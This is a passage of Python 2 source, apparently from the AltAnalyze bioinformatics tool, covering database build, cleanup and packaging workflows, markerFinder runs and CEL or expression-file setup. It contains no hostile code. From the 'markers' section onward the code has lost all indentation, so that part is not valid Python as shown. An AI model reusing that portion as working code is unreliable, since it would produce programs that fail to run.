            shutil.move(src, dstn)
            ### Also archive the junction and plain (non-RNASeq) variants when present
            try:
                srcj = string.replace(src,'RNASeq.','junction.'); dstnj = string.replace(dstn,'RNASeq.','junction.')
                shutil.move(srcj, dstnj)
            except Exception: null=[]
            try:
                src = string.replace(src,'_RNASeq.','.'); dstn = string.replace(dstn,'_RNASeq.','.')
                shutil.move(src, dstn)
            except Exception:
                print traceback.format_exc()
                pass
        except Exception:
            print traceback.format_exc()
            pass
    sys.exit()
### Database build/update workflows (everything except the 'Official' download path)
if update_dbs == 'yes' and 'Official' not in update_method:
    if 'cleanup' in update_method:
        ### Remove intermediate build artifacts (EnsemblSQL and SequenceData) for all species
        existing_species_dirs = unique.read_directory('/AltDatabase/ensembl')
        print 'Deleting EnsemblSQL directory for all species, ensembl version',ensembl_version
        for species in existing_species_dirs:
            export.deleteFolder('AltDatabase/ensembl/'+species+'/EnsemblSQL')
        existing_species_dirs = unique.read_directory('/AltDatabase')
        print 'Deleting SequenceData directory for all species, ensembl version',ensembl_version
        for species in existing_species_dirs:
            export.deleteFolder('AltDatabase/'+species+'/SequenceData')
        print 'Finished...exiting'
        sys.exit()
if 'package' not in update_method and 'markers' not in update_method:
    ### Full database build for one or more species/platforms (anything that is
    ### not the packaging or MarkerFinder sub-workflow).
    ### Example:
    ### python AltAnalyze.py --species all --arraytype all --update all --version 60
    ### tr -d \\r < AltAnalyze.py > AltAnalyze_new.py
    ### chmod +x AltAnalyze_new.py
    ### nohup ./AltAnalyze.py --update all --species Mm --arraytype gene --arraytype exon --version 60 2>&1 > nohup_v60_Mm.txt
    ### Expand 'all' into the concrete platform list supported for the species
    if array_type == 'all' and (species == 'Mm' or species == 'all'): array_type = ['AltMouse','exon','gene','junction','RNASeq']
    elif array_type == 'all' and (species == 'Hs' or species == 'Rn'): array_type = ['exon','gene','junction','RNASeq']
    else: array_type = [array_type]+additional_array_types
    if species == 'all' and 'RNASeq' not in array_type: species = selected_species ### just analyze the species for which multiple platforms are supported
    if species == 'selected': species = selected_species ### just analyze the species for which multiple platforms are supported
    elif species == 'all':
        ### Build the list of every Ensembl species name supported by this release
        all_supported_names = {}; all_species_names={}
        species_names = UI.getSpeciesInfo()
        for species in species_names: all_supported_names[species_names[species]]=species
        from build_scripts import EnsemblSQL
        child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies('release-'+ensembl_version)
        for ens_species in ensembl_species:
            ens_species = string.replace(ens_species,'_',' ')
            if ens_species in all_supported_names:
                all_species_names[all_supported_names[ens_species]]=[]
        ### The three core species are excluded here (built separately)
        del all_species_names['Hs']
        del all_species_names['Mm']
        del all_species_names['Rn']
        """
        del all_species_names['Go']
        del all_species_names['Bt']
        del all_species_names['Sc']
        del all_species_names['Ss']
        del all_species_names['Pv']
        del all_species_names['Pt']
        del all_species_names['La']
        del all_species_names['Tt']
        del all_species_names['Tr']
        del all_species_names['Ts']
        del all_species_names['Pb']
        del all_species_names['Pc']
        del all_species_names['Ec']
        del all_species_names['Tb']
        del all_species_names['Tg']
        del all_species_names['Dn']
        del all_species_names['Do']
        del all_species_names['Tn']
        del all_species_names['Dm']
        del all_species_names['Oc']
        del all_species_names['Og']
        del all_species_names['Fc']
        del all_species_names['Dr']
        del all_species_names['Me']
        del all_species_names['Cp']
        del all_species_names['Tt']
        del all_species_names['La']
        del all_species_names['Tr']
        del all_species_names['Ts']
        del all_species_names['Et'] ### No alternative isoforms?
        del all_species_names['Pc']
        del all_species_names['Tb']
        del all_species_names['Fc']
        del all_species_names['Sc']
        del all_species_names['Do']
        del all_species_names['Dn']
        del all_species_names['Og']
        del all_species_names['Ga']
        del all_species_names['Me']
        del all_species_names['Ml']
        del all_species_names['Mi']
        del all_species_names['St']
        del all_species_names['Sa']
        del all_species_names['Cs']
        del all_species_names['Vp']
        del all_species_names['Ch']
        del all_species_names['Ee']
        del all_species_names['Ac']"""
        sx=[]; all_species_names2=[] ### Ensure that the core selected species are run first
        for species in selected_species:
            if species in all_species_names: sx.append(species)
        for species in all_species_names:
            if species not in selected_species: all_species_names2.append(species)
        all_species_names = sx+all_species_names2
        species = all_species_names
    else: species = [species]
    ### Decide which build sub-steps to run based on --update flags
    update_uniprot='no'; update_ensembl='no'; update_probeset_to_ensembl='no'; update_domain='no'; update_miRs = 'no'; genomic_build = 'new'; update_miR_seq = 'yes'
    if 'all' in update_method:
        update_uniprot='yes'; update_ensembl='yes'; update_probeset_to_ensembl='yes'; update_domain='yes'; update_miRs = 'yes'
    if 'UniProt' in update_method: update_uniprot = 'yes'
    if 'Ensembl' in update_method: update_ensembl = 'yes'
    if 'Probeset' in update_method or 'ExonAnnotations' in update_method: update_probeset_to_ensembl = 'yes'
    if 'Domain' in update_method:
        update_domain = 'yes'
        try: from Bio import Entrez #test this
        except Exception: print 'The dependent module Bio is not installed or not accessible through the default python interpretter. Existing AltAnalyze.'; sys.exit()
    if 'miRBs' in update_method or 'miRBS' in update_method: update_miRs = 'yes'
    if 'NewGenomeBuild' in update_method: genomic_build = 'new'
    if 'current' in ensembl_version: print "Please specify an Ensembl version number (e.g., 60) before proceeding with the update.";sys.exit()
    try: force = force ### Variable is not declared otherwise
    except Exception: force = 'yes'; print 'force:',force
    existing_species_dirs={}
    update_all = 'no' ### We don't pass this as yes, in order to skip certain steps when multiple array types are analyzed (others are specified above)
    try: print "Updating AltDatabase the following array_types",string.join(array_type),"for the species",string.join(species)
    except Exception: print 'Please designate a valid platform/array_type (e.g., exon) and species code (e.g., Mm).'
    for specific_species in species:
        for platform_name in array_type:
            ### Only certain species/platform combinations are buildable
            if platform_name == 'AltMouse' and specific_species == 'Mm': proceed = 'yes'
            elif platform_name == 'exon' or platform_name == 'gene':
                from build_scripts import ExonArrayEnsemblRules
                #### Check to see if the probeset.csv file is present
                #try: probeset_transcript_file = ExonArrayEnsemblRules.getDirectoryFiles('/AltDatabase/'+specific_species+'/'+platform_name)
                #except Exception: print "Affymetrix probeset.csv anotation file is not found. You must save this to",'/AltDatabase/'+specific_species+'/'+platform_name,'before updating (unzipped).'; sys.exit()
                proceed = 'yes'
            elif platform_name == 'junction' and (specific_species == 'Hs' or specific_species == 'Mm'): proceed = 'yes'
            elif platform_name == 'RNASeq': proceed = 'yes'
            else: proceed = 'no'
            if proceed == 'yes':
                print "Analyzing", specific_species, platform_name
                if (platform_name != array_type[0]) and len(species)==1:
                    update_uniprot = 'no'; update_ensembl = 'no'; update_miR_seq = 'no' ### Don't need to do this twice in a row
                    print 'Skipping ensembl, uniprot and mir-sequence file import updates since already completed for this species',array_type,platform_name
                if ignore_built_species == 'yes': ### Useful for when building all species for a new database build
                    try:
                        ### call this here to update with every species - if running multiple instances
                        existing_species_dirs = unique.read_directory('/AltDatabase/ensembl')
                    except Exception: #ZeroDivisionError
                        try: os.mkdir(unique.filepath('AltDatabase/'))
                        except Exception: pass #already exists
                        existing_species_dirs = []
                if specific_array_type != None and specific_array_type != platform_name: platform_name+='|'+specific_array_type ### For the hGlue vs. JAY arrays
                if specific_species not in existing_species_dirs: ### Useful when running multiple instances of AltAnalyze to build all species
                    print 'update_ensembl',update_ensembl
                    print 'update_uniprot',update_uniprot
                    print 'update_probeset_to_ensembl',update_probeset_to_ensembl
                    print 'update_domain',update_domain
                    print 'update_miRs',update_miRs
                    update.executeParameters(specific_species,platform_name,force,genomic_build,update_uniprot,update_ensembl,update_probeset_to_ensembl,update_domain,update_miRs,update_all,update_miR_seq,ensembl_version)
                else: print 'ignoring',specific_species
    sys.exit()
if 'package' in update_method:
    ### Package built AltDatabase content into distributable per-species zip archives.
    ### Example: python AltAnalyze.py --update package --species all --platform all --version 65
    if ensembl_version == 'current': print '\nPlease specify version of the database to package (e.g., --version 60).'; sys.exit()
    ensembl_version = 'EnsMart'+ensembl_version
    ### Get all possible species
    species_names = UI.getSpeciesInfo(); possible_species={}
    possible_species = species_names
    possible_arrays = ['exon','gene','junction','AltMouse','RNASeq']
    try:
        if species == 'all': possible_species = possible_species
        elif species == 'selected': possible_species = selected_species
        else: possible_species = [species]
    except Exception: species = possible_species
    if array_type == None or array_type == 'all': possible_arrays = possible_arrays
    else: possible_arrays = [array_type]+additional_array_types
    ### Map each requested species to the platforms actually present on disk
    species_to_package={}
    dirs = unique.read_directory('/AltDatabase/'+ensembl_version)
    #print possible_arrays, possible_species; sys.exit()
    for species_code in dirs:
        if species_code in possible_species:
            array_types = unique.read_directory('/AltDatabase/'+ensembl_version+'/'+species_code)
            for arraytype in array_types:
                if arraytype in possible_arrays:
                    if species_code in possible_species:
                        array_types = unique.read_directory('/AltDatabase/'+ensembl_version+'/'+species_code)
                        try: species_to_package[species_code].append(arraytype)
                        except Exception: species_to_package[species_code] = [arraytype]
    species_to_package = eliminate_redundant_dict_values(species_to_package)
    for species in species_to_package:
        ### Platform-specific files copied per array type further below
        files_to_copy =[species+'_Ensembl_domain_aligning_probesets.txt']
        files_to_copy+=[species+'_Ensembl_indirect_domain_aligning_probesets.txt']
        files_to_copy+=[species+'_Ensembl_probesets.txt']
        files_to_copy+=[species+'_Ensembl_exons.txt']
        #files_to_copy+=[species+'_Ensembl_junctions.txt']
        files_to_copy+=[species+'_exon_core.mps']
        files_to_copy+=[species+'_exon_extended.mps']
        files_to_copy+=[species+'_exon_full.mps']
        files_to_copy+=[species+'_gene_core.mps']
        files_to_copy+=[species+'_gene_extended.mps']
        files_to_copy+=[species+'_gene_full.mps']
        files_to_copy+=[species+'_gene-exon_probesets.txt']
        files_to_copy+=[species+'_probes_to_remove.txt']
        files_to_copy+=[species+'_probeset-probes.txt']
        files_to_copy+=[species+'_probeset_microRNAs_any.txt']
        files_to_copy+=[species+'_probeset_microRNAs_multiple.txt']
        files_to_copy+=['probeset-domain-annotations-exoncomp.txt']
        files_to_copy+=['probeset-protein-annotations-exoncomp.txt']
        #files_to_copy+=['probeset-protein-dbase_exoncomp.txt']
        files_to_copy+=['SEQUENCE-protein-dbase_exoncomp.txt']
        files_to_copy+=[species+'_Ensembl_junction_probesets.txt']
        files_to_copy+=[species+'_Ensembl_AltMouse_probesets.txt']
        files_to_copy+=[species+'_RNASeq-exon_probesets.txt']
        files_to_copy+=[species+'_junction-exon_probesets.txt']
        files_to_copy+=[species+'_junction_all.mps']
        files_to_copy+=['platform.txt'] ### Indicates the specific platform for an array type (e.g., HJAY for junction or hGlue for junction)
        files_to_copy+=[species+'_junction_comps_updated.txt']
        files_to_copy+=['MASTER-probeset-transcript.txt']
        files_to_copy+=['AltMouse-Ensembl.txt']
        files_to_copy+=['AltMouse_junction-comparisons.txt']
        files_to_copy+=['AltMouse_gene_annotations.txt']
        files_to_copy+=['AltMouse_annotations.txt']
        ### Species-level (platform-independent) annotation files
        common_to_copy =['uniprot/'+species+'/custom_annotations.txt']
        common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl-annotations_simple.txt']
        common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl-annotations.txt']
        common_to_copy+=['ensembl/'+species+'/'+species+'_microRNA-Ensembl.txt']
        common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_transcript-biotypes.txt']
        common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_transcript-annotations.txt']
        common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'Ensembl_Protein')
        common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'ProteinFeatures')
        common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'ProteinCoordinates')
        common_to_copy+= searchDirectory("AltDatabase/uniprot/"+species+"/",'FeatureCoordinate')
        supported_arrays_present = 'no'
        for arraytype in selected_platforms:
            if arraytype in species_to_package[species]: supported_arrays_present = 'yes' #Hence a non-RNASeq platform is present
        if supported_arrays_present == 'yes':
            for file in common_to_copy:
                ir = 'AltDatabase/'+ensembl_version+'/'
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'
                export.copyFile(ir+file, er+file)
        if 'RNASeq' in species_to_package[species]:
            common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_junction.txt']
            common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_exon.txt']
            for file in common_to_copy:
                ir = 'AltDatabase/'+ensembl_version+'/'
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'
                if species in selected_species:
                    er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/' ### This allows us to build the package archive in a separate directory for selected species, so separate but overlapping content can be packaged
                export.copyFile(ir+file, er+file)
        for array_type in species_to_package[species]:
            ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+'/'
            er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'+species+'/'+array_type+'/'
            if array_type == 'junction':
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+array_type+'/'
            if array_type == 'RNASeq' and species in selected_species:
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/'+species+'/'+array_type+'/'
            for file in files_to_copy:
                if array_type == 'RNASeq': file=string.replace(file,'_updated.txt','.txt')
                filt_file = string.replace(file ,'.txt','-filtered.txt')
                ### Prefer the '-filtered' variant of each file when present
                try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
                except Exception:
                    try: export.copyFile(ir+file, er+file); export_path = er+file
                    except Exception: null = [] ### File not found in directory
                if len(export_path)>0:
                    if 'AltMouse' in export_path or 'probes_' in export_path:
                        export.cleanFile(export_path)
            if array_type == 'junction':
                subdir = '/exon/'
                ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+subdir
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+array_type+subdir
                for file in files_to_copy:
                    export_path=[]
                    filt_file = string.replace(file ,'.txt','-filtered.txt')
                    try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
                    except Exception:
                        try: export.copyFile(ir+file, er+file); export_path = er+file
                        except Exception: null = [] ### File not found in directory
            if array_type == 'RNASeq':
                subdir = '/junction/'
                ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+subdir
                er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'+species+'/'+array_type+subdir
                if species in selected_species:
                    er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/'+species+'/'+array_type+subdir
                for file in files_to_copy:
                    if 'SEQUENCE-protein-dbase' not in file and 'domain_aligning' not in file: ### This data is now combined into the main file
                        export_path=[]
                        filt_file = string.replace(file ,'.txt','-filtered.txt')
                        try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
                        except Exception:
                            try: export.copyFile(ir+file, er+file); export_path = er+file
                            except Exception: null = [] ### File not found in directory
        ### Zip the assembled per-species archives
        if 'RNASeq' in species_to_package[species]:
            src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version
            dst = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+species+'_RNASeq.zip'
            if species in selected_species:
                src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version
            update.zipDirectory(src); print 'Zipping',species, array_type, dst
            os.rename(src+'.zip', dst)
        if supported_arrays_present == 'yes':
            src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version
            dst = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+species+'.zip'
            update.zipDirectory(src); print 'Zipping',species, array_type, dst
            os.rename(src+'.zip', dst)
        if 'junction' in species_to_package[species]:
            src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/junction'
            dst = string.replace(src,'junction',species+'_junction.zip')
            update.zipDirectory(src); print 'Zipping',species+'_junction'
            os.rename(src+'.zip', dst)
    sys.exit()
if 'markers' in update_method:
if species == None or platform == None:
print "WARNING! A species and platform (e.g., exon, junction, 3'array or RNASeq) must be defined to identify markers.";sys.exit()
elif input_exp_file == '':
print "WARNING! A input expression file must be supplied (e.g., ExpressionOutput/DATASET.YourExperimentName.txt) for this analysis.";sys.exit()
else:
#python AltAnalyze.py --update markers --platform gene --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/Mm_Gene-TissueAtlas/ExpressionInput/exp.meta.txt"
#python AltAnalyze.py --update markers --platform gene --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/Mm_Gene-TissueAtlas/AltResults/RawSpliceData/Mm/splicing-index/meta.txt"
#python AltAnalyze.py --update markers --platform "3'array" --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/U133/ExpressionOutput/DATASET-meta.txt"
#python AltAnalyze.py --update markers --compendiumType ncRNA --platform "exon" --expdir "/home/socr/c/users2/salomoni/conklin/nsalomonis/normalization/Hs_Exon-TissueAtlas/ExpressionOutput/DATASET-meta.txt"
#python AltAnalyze.py --update markers --platform RNASeq --species Mm --geneRPKM 1 --expdir /Users/saljh8/Desktop/Grimes/MergedRSEM/DN-Analysis/ExpressionInput/exp.DN.txt --genesToReport 200
"""The markerFinder module:
1) takes an input ExpressionOutput file (DATASET.YourExperimentName.txt)
2) extracts group average expression and saves to AVERAGE.YourExperimentName.txt to the ExpressionOutput directory
3) re-imports AVERAGE.YourExperimentName.txt
4) correlates the average expression of each gene to an idealized profile to derive a Pearson correlation coefficient
5) identifies optimal markers based on these correlations for each tissue
6) exports an expression file with just these marker genes and tissues
This module can perform these analyses on protein coding or ncRNAs and can segregate the cell/tissue groups into clusters
when a group notation is present in the sample name (e.g., 0~Heart, 0~Brain, 1~Stem Cell)"""
import markerFinder
if 'AltResults' in input_exp_file and 'Clustering' not in input_exp_file:
### This applies to a file compoosed of exon-level normalized intensities (calculae average group expression)
markerFinder.getAverageExonExpression(species,platform,input_exp_file)
if 'Raw' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'Raw','AVERAGE')
else:
group_exp_file = string.replace(input_exp_file,'FullDatasets','AVERAGE-FullDatasets')
altexon_correlation_file = markerFinder.analyzeData(group_exp_file,species,platform,compendiumType,geneToReport=genesToReport,correlateAll=correlateAll,AdditionalParameters=fl)
markerFinder.getExprValsForNICorrelations(platform,altexon_correlation_file,group_exp_file)
else:
### This applies to an ExpressionOutput DATASET file composed of gene expression values (averages already present)
import collections
try: test_ordereddict=collections.OrderedDict()
except Exception:
try: import ordereddict
except Exception:
### This is needed to re-order the average file so that the groups are sequentially ordered when analyzing clustered groups (0~)
print 'Warning!!!! To run markerFinder correctly call python version 2.7x or greater (python 3.x not supported)'
print 'Requires ordereddict (also can install the library ordereddict). To call 2.7: /usr/bin/python2.7'
sys.exit()
try:
output_dir = markerFinder.getAverageExpressionValues(input_exp_file,platform) ### Either way, make an average annotated file from the DATASET file
if 'DATASET' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'DATASET','AVERAGE')
else:
group_exp_file = (input_exp_file,output_dir) ### still analyze the primary sample
except Exception:
#print traceback.format_exc()
print 'No DATASET file present (used to obtain gene annotations)...'
### Work around when performing this analysis on an alternative exon input cluster file
group_exp_file = input_exp_file
fl = UI.ExpressionFileLocationData(input_exp_file,'','',''); fl.setOutputDir(export.findParentDir(export.findParentDir(input_exp_file)[:-1]))
try: fl.setSpecies(species); fl.setVendor(vendor)
except Exception: pass
try:
rpkm_threshold = float(rpkm_threshold) ### If supplied, for any platform, use it
fl.setRPKMThreshold(rpkm_threshold)
except Exception: pass
if platform=='RNASeq':
try: rpkm_threshold = float(rpkm_threshold)
except Exception: rpkm_threshold = 1.0
fl.setRPKMThreshold(rpkm_threshold)
try: correlationDirection = direction ### correlate to a positive or inverse negative in silico artificial pattern
except Exception: correlationDirection = 'up'
fl.setCorrelationDirection(correlationDirection)
if expression_data_format == 'non-log': logTransform = True
else: logTransform = False
if 'topSplice' in input_exp_file:
markerFinder.filterRNASeqSpliceEvents(species,platform,fl,input_exp_file)
sys.exit()
if 'stats.' in input_exp_file:
markerFinder.filterDetectionPvalues(species,platform,fl,input_exp_file)
sys.exit()
else:
markerFinder.analyzeData(group_exp_file,species,platform,compendiumType,geneToReport=genesToReport,correlateAll=correlateAll,AdditionalParameters=fl,logTransform=logTransform)
try: fl.setVendor(manufacturer)
except Exception:
print '--vendor not indicated by user... assuming Affymetrix'
fl.setVendor('Affymetrix')
try: markerFinder.generateMarkerHeatMaps(fl,array_type,convertNonLogToLog=logTransform,Species=species)
except Exception: print traceback.format_exc()
print 'Cell/Tissue marker classification analysis finished';sys.exit()
if 'EnsMart' in ensembl_version:
UI.exportDBversion(ensembl_version)
annotation_found = verifyFile(input_annotation_file)
proceed = 'no'
if 'Official' not in update_method and denom_file_dir == None: ### If running GO-Elite independent of AltAnalyze (see below GO_Elite call)
try:
time_stamp = timestamp()
if len(cel_file_dir)>0:
if output_dir == None:
output_dir = cel_file_dir
print "Setting output directory to the input path:", output_dir
if output_dir == None and input_filtered_dir>0:
output_dir = input_filtered_dir
try:
if '/' == output_dir[-1] or '\\' in output_dir[-2]: null=[]
else: output_dir +='/'
except:
try: output_dir = export.findParentDir(input_file_dir)
except:
output_dir = input_fastq_dir
log_file = filepath(output_dir+'/AltAnalyze_report-'+time_stamp+'.log')
log_report = open(log_file,'w'); log_report.close()
sys.stdout = Logger('')
except Exception,e:
print traceback.format_exc()
print 'Please designate an output directory before proceeding (e.g., --output "C:\RNASeq)';sys.exit()
try: print string.join(arguments,' ')
except Exception: pass
if mappedExonAnalysis:
array_type = 'RNASeq' ### Although this is not the actual platform, the resulting data will be treated as RNA-Seq with parameters most suitable for arrays
if len(external_annotation_dir)>0:
run_from_scratch = 'Annotate External Results'
if channel_to_extract != None:
run_from_scratch = 'Process Feature Extraction files' ### Agilent Feature Extraction files as input for normalization
manufacturer = 'Agilent'
constitutive_source = 'Agilent'
expression_threshold = 'NA'
perform_alt_analysis = 'NA'
if len(input_filtered_dir)>0:
run_from_scratch ='Process AltAnalyze filtered'; proceed='yes'
if len(input_exp_file)>0:
run_from_scratch = 'Process Expression file'; proceed='yes'
input_exp_file = string.replace(input_exp_file,'\\','/') ### Windows convention is \ rather than /, but works with /
ief_list = string.split(input_exp_file,'/')
if len(output_dir)>0: parent_dir = output_dir
else: parent_dir = string.join(ief_list[:-1],'/')
exp_name = ief_list[-1]
if len(cel_file_dir)>0 or runKallisto == True:
# python AltAnalyze.py --species Mm --platform RNASeq --runKallisto yes --expname test
if exp_name == None:
print "No experiment name defined. Please sumbit a name (e.g., --expname CancerComp) before proceeding."; sys.exit()
else:
dataset_name = 'exp.'+exp_name+'.txt'; exp_file_dir = filepath(output_dir+'/ExpressionInput/'+dataset_name)
if runKallisto:
run_from_scratch == 'Process RNA-seq reads'
elif run_from_scratch!= 'Process Feature Extraction files':
run_from_scratch = 'Process CEL files'; proceed='yes'
if array_type == 'RNASeq': file_ext = '.BED'
else: file_ext = '.CEL'
try: cel_files,cel_files_fn = UI.identifyCELfiles(cel_file_dir,array_type,manufacturer)
except Exception,e:
print e
if mappedExonAnalysis: pass
else: print "No",file_ext,"files found in the directory:",cel_file_dir;sys.exit()
if array_type != 'RNASeq': cel_file_list_dir = UI.exportCELFileList(cel_files_fn,cel_file_dir)
if groups_file != None and comps_file != None:
try: export.copyFile(groups_file, string.replace(exp_file_dir,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: export.copyFile(comps_file, string.replace(exp_file_dir,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
groups_file = string.replace(exp_file_dir,'exp.','groups.')
comps_file = string.replace(exp_file_dir,'exp.','comps.')
if verifyGroupFileFormat(groups_file) == False:
print "\nWarning! The format of your groups file is not correct. For details, see:\nhttp://altanalyze.readthedocs.io/en/latest/ManualGroupsCompsCreation\n"
sys.exit()
if array_type != 'RNASeq' and manufacturer!= 'Agilent':
"""Determine if Library and Annotations for the array exist, if not, download or prompt for selection"""
try:
### For the HGLUE and HJAY arrays, this step is critical in order to have the command-line AltAnalyze download the appropriate junction database (determined from specific_array_type)
specific_array_types,specific_array_type = UI.identifyArrayType(cel_files_fn)
num_array_types = len(specific_array_types)
except Exception:
null=[]; num_array_types=1; specific_array_type=None
if array_type == 'exon':
if species == 'Hs': specific_array_type = 'HuEx-1_0-st-v2'
if species == 'Mm': specific_array_type = 'MoEx-1_0-st-v2'
if species == 'Rn': specific_array_type = 'RaEx-1_0-st-v2'
elif array_type == 'gene':
if species == 'Hs': specific_array_type = 'HuGene-1_0-st-v1'
if species == 'Mm': specific_array_type = 'MoGene-1_0-st-v1'
if species == 'Rn': specific_array_type = 'RaGene-1_0-st-v1'
elif array_type == 'AltMouse': specific_array_type = 'altMouseA'
"""
elif array_type == 'junction':
if species == 'Mm': specific_array_type = 'MJAY'
if species == 'Hs': specific_array_type = 'HJAY'
"""
supproted_array_db = UI.importSupportedArrayInfo()
if specific_array_type in supproted_array_db and input_cdf_file == None and input_annotation_file == None:
sa = supproted_array_db[specific_array_type]; species = sa.Species(); array_type = sa.ArrayType()
input_cdf_file, input_annotation_file, bgp_file, clf_file = UI.getAffyFilesRemote(specific_array_type,array_type,species)
else: array_type = "3'array"
cdf_found = verifyFile(input_cdf_file)
annotation_found = verifyFile(input_annotation_file)
if input_cdf_file == None:
print [specific_array_type], 'not currently supported... Please provide CDF to AltAnalyze (commandline or GUI) or manually add to AltDatabase/affymetrix/LibraryFiles'; sys.exit()
if cdf_found != "found":
### Copy valid Library files to a local AltAnalyze database directory
input_cdf_file_lower = string.lower(input_cdf_file)
if array_type == "3'array":
if '.cdf' in input_cdf_file_lower:
clf_file='';bgp_file=''; assinged = 'yes'
###Thus the CDF or PGF file was confirmed, so copy it over to AltDatabase
icf_list = string.split(input_cdf_file,'/'); cdf_short = icf_list[-1]
destination_parent = 'AltDatabase/affymetrix/LibraryFiles/'
destination_parent = osfilepath(destination_parent+cdf_short)
info_list = input_cdf_file,destination_parent; UI.StatusWindow(info_list,'copy')
else: print "Valid CDF file not found. Exiting program.";sys.exit()
else:
if '.pgf' in input_cdf_file_lower:
###Check to see if the clf and bgp files are present in this directory
icf_list = string.split(input_cdf_file,'/'); parent_dir = string.join(icf_list[:-1],'/'); cdf_short = icf_list[-1]
clf_short = string.replace(cdf_short,'.pgf','.clf')
kil_short = string.replace(cdf_short,'.pgf','.kil') ### Only applies to the Glue array
if array_type == 'exon' or array_type == 'junction': bgp_short = string.replace(cdf_short,'.pgf','.antigenomic.bgp')
else: bgp_short = string.replace(cdf_short,'.pgf','.bgp')
dir_list = read_directory(parent_dir)
if clf_short in dir_list and bgp_short in dir_list:
pgf_file = input_cdf_file
clf_file = string.replace(pgf_file,'.pgf','.clf')
kil_file = string.replace(pgf_file,'.pgf','.kil') ### Only applies to the Glue array
if array_type == 'exon' or array_type == 'junction': bgp_file = string.replace(pgf_file,'.pgf','.antigenomic.bgp')
else: bgp_file = string.replace(pgf_file,'.pgf','.bgp')
assinged = 'yes'
###Thus the CDF or PGF file was confirmed, so copy it over to AltDatabase
destination_parent = 'AltDatabase/affymetrix/LibraryFiles/'
info_list = input_cdf_file,osfilepath(destination_parent+cdf_short); UI.StatusWindow(info_list,'copy')
info_list = clf_file,osfilepath(destination_parent+clf_short); UI.StatusWindow(info_list,'copy')
info_list = bgp_file,osfilepath(destination_parent+bgp_short); UI.StatusWindow(info_list,'copy')
if 'Glue' in pgf_file:
info_list = kil_file,osfilepath(destination_parent+kil_short); UI.StatusWindow(info_list,'copy')
if annotation_found != "found" and update_dbs == 'no' and array_type != 'RNASeq' and denom_file_dir == None and manufacturer != 'Agilent':
### Copy valid Annotation files to a local AltAnalyze database directory
try:
input_annotation_lower = string.lower(input_annotation_file)
if '.csv' in input_annotation_lower:
assinged = 'yes'
###Thus the annotation CSV file was confirmed, so copy it over to AltDatabase
icf_list = string.split(input_annotation_file,'/'); csv_short = icf_list[-1]
destination_parent = 'AltDatabase/affymetrix/'+species+'/'
info_list = input_annotation_file,filepath(destination_parent+csv_short); UI.StatusWindow(info_list,'copy')
except Exception: print "No Affymetrix annotation file provided. AltAnalyze will use any .csv annotations files in AltDatabase/Affymetrix/"+species
if array_type == 'PSI':
array_type = "3'array"
vendor = 'PSI'
if 'Official' in update_method and species != None:
proceed = 'yes'
elif array_type != None and species != None:
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults(array_type,species)
ge_fold_cutoffs, ge_pvalue_cutoffs, ge_ptype, filter_method, z_threshold, p_val_threshold, change_threshold, ORA_algorithm, resources_to_analyze, goelite_permutations, mod, returnPathways, NA = goelite_defaults
use_direct_domain_alignments_only,microRNA_prediction_method = functional_analysis_defaults
analysis_method, additional_algorithms, filter_probeset_types, analyze_all_conditions, p_threshold, alt_exon_fold_variable, additional_score, permute_p_threshold, gene_expression_cutoff, remove_intronic_junctions, perform_permutation_analysis, export_NI_values, run_MiDAS, calculate_normIntensity_p, filter_for_AS = alt_exon_defaults
dabg_p, rpkm_threshold, gene_exp_threshold, exon_exp_threshold, exon_rpkm_threshold, expression_threshold, perform_alt_analysis, analyze_as_groups, expression_data_format, normalize_feature_exp, normalize_gene_data, avg_all_for_ss, include_raw_data, probability_statistic, FDR_statistic, batch_effects, marker_finder, visualize_qc_results, run_lineage_profiler, null = expr_defaults
elif denom_file_dir != None and species != None:
proceed = 'yes' ### Only run GO-Elite
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults('RNASeq',species) ### platform not relevant
ge_fold_cutoffs, ge_pvalue_cutoffs, ge_ptype, filter_method, z_threshold, p_val_threshold, change_threshold, ORA_algorithm, resources_to_analyze, goelite_permutations, mod, returnPathways, NA = goelite_defaults
else:
